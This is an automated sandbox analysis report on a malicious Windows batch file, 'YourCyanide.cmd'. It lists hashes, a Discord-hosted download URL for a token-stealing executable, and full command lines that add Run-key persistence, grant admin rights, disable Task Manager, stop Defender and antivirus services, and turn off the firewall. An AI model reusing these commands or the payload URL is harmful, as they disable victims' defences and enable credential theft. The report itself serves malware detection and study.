Resubmissions
15-11-2024 12:51
241115-p3ywnsthmh 918-05-2022 00:35
220518-axmh5abbc9 1018-05-2022 00:32
220518-avncmsbbb7 10Analysis
-
max time kernel
97s -
max time network
100s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
18-05-2022 00:32
Static task
static1
Behavioral task
behavioral1
Sample
YourCyanide.cmd
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
YourCyanide.cmd
Resource
win10v2004-20220414-en
General
-
Target
YourCyanide.cmd
-
Size
90KB
-
MD5
4cb725f17bec289507f9e8249c8ea80e
-
SHA1
a7034e84cb884bf90e61ce3b621424bec57334ae
-
SHA256
1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
-
SHA512
776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288
Malware Config
Extracted
https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe
Extracted
C:\Users\Admin\Desktop\YcynNote.txt
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 2 IoCs
flow pid Process 24 3048 powershell.exe 34 3556 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 648 GetToken.exe -
Modifies Windows Firewall 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4350_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4487_toolbar = "ycynlog.cmd" reg.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat" reg.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\Windows\win.ini cmd.exe File opened for modification C:\Windows\system.ini cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 1 IoCs
pid Process 1436 taskkill.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\MuiCache ShellExperienceHost.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2312 reg.exe -
NTFS ADS 4 IoCs
description ioc Process File opened for modification C:\Users\Admin\%onRsx:~13 cmd.exe File opened for modification C:\Users\Admin\%RafEw:~4 cmd.exe File opened for modification C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24 cmd.exe File opened for modification C:\Users\Admin\%ONRsX:~13 cmd.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 54 IoCs
pid Process 636 powershell.exe 636 powershell.exe 636 powershell.exe 1796 tskill.exe 1796 tskill.exe 4624 tskill.exe 4624 tskill.exe 3564 tskill.exe 3564 tskill.exe 1620 tskill.exe 1620 tskill.exe 1784 tskill.exe 1784 tskill.exe 2616 tskill.exe 2616 tskill.exe 3376 tskill.exe 3376 tskill.exe 2124 tskill.exe 2124 tskill.exe 4932 tskill.exe 4932 tskill.exe 1516 tskill.exe 1516 tskill.exe 1880 tskill.exe 1880 tskill.exe 3104 tskill.exe 3104 tskill.exe 2428 tskill.exe 2428 tskill.exe 3048 powershell.exe 3048 powershell.exe 3048 powershell.exe 4960 powershell.exe 4960 powershell.exe 3676 netsh.exe 3676 netsh.exe 3436 powershell.exe 3436 powershell.exe 3676 netsh.exe 4960 powershell.exe 3436 powershell.exe 2216 powershell.exe 2216 powershell.exe 4960 powershell.exe 3676 netsh.exe 2216 powershell.exe 3436 powershell.exe 2216 powershell.exe 3024 powershell.exe 3024 powershell.exe 3024 powershell.exe 3556 powershell.exe 3556 powershell.exe 3556 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
description pid Process Token: SeDebugPrivilege 636 powershell.exe Token: SeDebugPrivilege 1436 taskkill.exe Token: SeDebugPrivilege 3048 powershell.exe Token: SeDebugPrivilege 4960 powershell.exe Token: SeDebugPrivilege 3676 netsh.exe Token: SeDebugPrivilege 3436 powershell.exe Token: SeDebugPrivilege 2216 powershell.exe Token: SeDebugPrivilege 3024 powershell.exe Token: SeDebugPrivilege 3556 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4636 ShellExperienceHost.exe 4636 ShellExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4264 wrote to memory of 1144 4264 cmd.exe 80 PID 4264 wrote to memory of 1144 4264 cmd.exe 80 PID 4264 wrote to memory of 5060 4264 cmd.exe 81 PID 4264 wrote to memory of 5060 4264 cmd.exe 81 PID 4264 wrote to memory of 1732 4264 cmd.exe 82 PID 4264 wrote to memory of 1732 4264 cmd.exe 82 PID 4264 wrote to memory of 1480 4264 cmd.exe 84 PID 4264 wrote to memory of 1480 4264 cmd.exe 84 PID 4264 wrote to memory of 5004 4264 cmd.exe 86 PID 4264 wrote to memory of 5004 4264 cmd.exe 86 PID 4264 wrote to memory of 4832 4264 cmd.exe 88 PID 4264 wrote to memory of 4832 4264 cmd.exe 88 PID 4264 wrote to memory of 4796 4264 cmd.exe 90 PID 4264 wrote to memory of 4796 4264 cmd.exe 90 PID 4264 wrote to memory of 636 4264 cmd.exe 92 PID 4264 wrote to memory of 636 4264 cmd.exe 92 PID 4264 wrote to memory of 3324 4264 cmd.exe 93 PID 4264 wrote to memory of 3324 4264 cmd.exe 93 PID 3324 wrote to memory of 4980 3324 net.exe 94 PID 3324 wrote to memory of 4980 3324 net.exe 94 PID 4264 wrote to memory of 1960 4264 cmd.exe 95 PID 4264 wrote to memory of 1960 4264 cmd.exe 95 PID 4264 wrote to memory of 1588 4264 cmd.exe 96 PID 4264 wrote to memory of 1588 4264 cmd.exe 96 PID 4264 wrote to memory of 3764 4264 cmd.exe 97 PID 4264 wrote to memory of 3764 4264 cmd.exe 97 PID 4264 wrote to memory of 112 4264 cmd.exe 99 PID 4264 wrote to memory of 112 4264 cmd.exe 99 PID 4264 wrote to memory of 4000 4264 cmd.exe 101 PID 4264 wrote to memory of 4000 4264 cmd.exe 101 PID 4000 wrote to memory of 2284 4000 net.exe 102 PID 4000 wrote to memory of 2284 4000 net.exe 102 PID 3764 wrote to memory of 3656 3764 cmd.exe 103 PID 3764 wrote to memory of 3656 3764 cmd.exe 103 PID 112 wrote to memory of 4784 112 cmd.exe 104 PID 112 wrote to memory of 4784 112 cmd.exe 104 PID 3764 wrote to memory of 1812 3764 cmd.exe 105 PID 3764 wrote to memory of 1812 3764 cmd.exe 105 PID 112 wrote to memory of 3732 112 cmd.exe 106 PID 112 wrote to memory of 3732 112 cmd.exe 106 PID 3764 wrote to memory of 4808 3764 cmd.exe 107 PID 3764 wrote to memory of 4808 3764 cmd.exe 107 PID 112 wrote to memory of 3496 112 cmd.exe 108 PID 112 wrote to memory of 3496 112 cmd.exe 108 PID 3764 wrote to memory of 764 3764 cmd.exe 109 PID 3764 wrote to memory of 764 3764 cmd.exe 109 PID 4264 wrote to memory of 1436 4264 cmd.exe 110 PID 4264 wrote to memory of 1436 4264 cmd.exe 110 PID 112 wrote to memory of 1440 112 cmd.exe 111 PID 112 wrote to memory of 1440 112 cmd.exe 111 PID 3764 wrote to memory of 2216 3764 cmd.exe 112 PID 3764 wrote to memory of 2216 3764 cmd.exe 112 PID 112 wrote to memory of 2104 112 cmd.exe 113 PID 112 wrote to memory of 2104 112 cmd.exe 113 PID 4264 wrote to memory of 4052 4264 cmd.exe 114 PID 4264 wrote to memory of 4052 4264 cmd.exe 114 PID 3764 wrote to memory of 2584 3764 cmd.exe 115 PID 3764 wrote to memory of 2584 3764 cmd.exe 115 PID 4052 wrote to memory of 2924 4052 net.exe 116 PID 4052 wrote to memory of 2924 4052 net.exe 116 PID 4264 wrote to memory of 1368 4264 cmd.exe 117 PID 4264 wrote to memory of 1368 4264 cmd.exe 117 PID 1368 wrote to memory of 3348 1368 net.exe 118 PID 1368 wrote to memory of 3348 1368 net.exe 118 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1144 attrib.exe 2760 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:4264 -
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd2⤵
- Views/modifies file attributes
PID:1144
-
-
C:\Windows\system32\rundll32.exeRUNDLL32 USER32.DLL SwapMouseButton2⤵PID:5060
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1732
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:1480
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:5004
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4832
-
-
C:\Windows\system32\cmd.execmd.exe2⤵PID:4796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD2⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD3⤵PID:4980
-
-
-
C:\Windows\system32\reg.exereg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4350_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f2⤵
- Adds Run key to start application
PID:1960
-
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f2⤵PID:1588
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3764 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3656
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1812
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4808
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:764
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2216
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2584
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1100
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4140
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4228
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2880
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3120
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4324
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2156
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2020
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4964
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1532
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3664
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3520
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1440
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2104
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:768
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2384
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4304
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5100
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4824
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4324
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4816
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1880
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1960
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3688
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:380
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2356
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3228
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4624
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3704
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3844
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5048
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4288
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3376
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4824
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1084
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3124
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2452
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4208
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2840
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3732
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4944
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1088
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3176
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:720
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1608
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2924
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3340
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1784
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4988
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3092
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2272
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3556
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3176
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2148
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4024
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3704
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2632
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4304
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4204
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3996
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3124
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5024
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3728
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3520
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4336
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3384
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵
- Suspicious use of WriteProcessMemory
PID:112 -
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4784
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3732
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3496
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1440
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2104
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3848
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4708
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3840
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4304
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2488
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1932
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2212
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1144
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3912
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2288
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2428
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3380
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2128
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4024
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1368
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2004
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:60
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4676
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1572
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4720
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3224
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:872
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3640
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2552
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2000
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4000
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3568
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2924
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4036
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3836
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3840
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3564
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1860
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4204
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2220
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1708
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:64
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1204
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1912
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:636
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2224
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3980
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:224
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4936
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2284
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4332
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:764
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2388
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2356
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3988
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3992
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3172
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3376
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2652
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1656
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:2744
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3504
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1436
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4412
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4052
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4036
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3048
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4064
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:5112
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1668
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:796
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:3892
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:1512
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:512
-
-
-
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:4000 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:2284
-
-
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im "MSASCui.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1436
-
-
C:\Windows\system32\net.exenet stop "wuauserv"2⤵
- Suspicious use of WriteProcessMemory
PID:4052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"3⤵PID:2924
-
-
-
C:\Windows\system32\net.exenet stop "security center"2⤵
- Suspicious use of WriteProcessMemory
PID:1368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "security center"3⤵PID:3348
-
-
-
C:\Windows\system32\net.exenet stop sharedaccess2⤵PID:3988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop sharedaccess3⤵PID:3780
-
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:4396
-
-
C:\Windows\system32\net.exenet stop "Security Center" /y2⤵PID:1580
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y3⤵PID:1892
-
-
-
C:\Windows\system32\net.exenet stop "Automatic Updates" /y2⤵PID:2220
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Automatic Updates" /y3⤵PID:4272
-
-
-
C:\Windows\system32\net.exenet stop "Symantec Core LC" /y2⤵PID:4516
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y3⤵PID:3712
-
-
-
C:\Windows\system32\net.exenet stop "SAVScan" /y2⤵PID:3996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVScan" /y3⤵PID:3368
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Firewall Monitor Service" /y2⤵PID:1248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y3⤵PID:3224
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto-Protect Service" /y2⤵PID:2124
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y3⤵PID:4448
-
-
-
C:\Windows\system32\net.exenet stop "norton AntiVirus Auto Protect Service" /y2⤵PID:952
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto Protect Service" /y3⤵PID:1880
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Spamkiller Server" /y2⤵PID:636
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Spamkiller Server" /y3⤵PID:3624
-
-
-
C:\Windows\system32\net.exenet stop "McAfee Personal Firewall Service" /y2⤵PID:3104
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y3⤵PID:1588
-
-
-
